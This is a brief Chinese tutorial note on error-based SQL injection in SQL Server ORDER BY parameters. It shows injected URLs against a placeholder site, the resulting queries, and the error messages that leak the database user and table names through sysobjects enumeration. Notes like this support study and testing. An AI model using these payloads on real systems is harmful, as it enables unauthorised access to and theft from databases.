0x01 前言
与普通注入无异,记一下语法即可
关于更多SQL Server的爆错方法:https://www.yuque.com/avenue-le/bmhg6h/sblmvg
0x02 跑user
WEB:http://www.test.com/sql.php?orderby=id-user
SQL:SELECT * from article order by id-user desc
1> SELECT * from article order by id-user desc;2> go22018 - [SQL Server]在将 nvarchar 值 'dbo' 转换成数据类型 int 时失败。
0x03 跑表名
注意:
OVER(Order by table_name) 里面的 name 要修改为 test.dbo.sysobjects 表里面存在的一个字段
查询不同的库可以这样
例如现在有 test库 与 test2库
那么就可以这样调用
test.dbo.sysobjects
test2.dbo.sysobjects
查询不同的表可以这样
例如:
修改 row_number>=1
修改 row_number>=2
注意:
XType=’U’ 表示获取某数据库的所有用户表;
XType=’S’ 表示获取某数据库的所有系统表;
例如现在查询得是 test 库得表名
WEB:http://www.test.com/sql.php?orderby=id-(select name from (select ROW_NUMBER() OVER(Order by name) AS row_number,name FROM test.dbo.sysobjects Where XType=’U’) as a where row_number=1)
SQL:SELECT * from article order by id-(select name from (select ROW_NUMBER() OVER(Order by name) AS row_number,name FROM test.dbo.sysobjects Where XType=’U’) as a where row_number=1) desc
1> SELECT*FROMarticleORDER BYid - (SELECTnameFROM(SELECTROW_NUMBER () OVER (ORDER BY name) AS row_number,nameFROMtest.dbo.sysobjectsWHEREXType = 'U') AS aWHERErow_number = 1) DESC;2> go22018 - [SQL Server]在将 nvarchar 值 'article' 转换成数据类型 int 时失败。
若有收获,就点个赞吧
0 人点赞
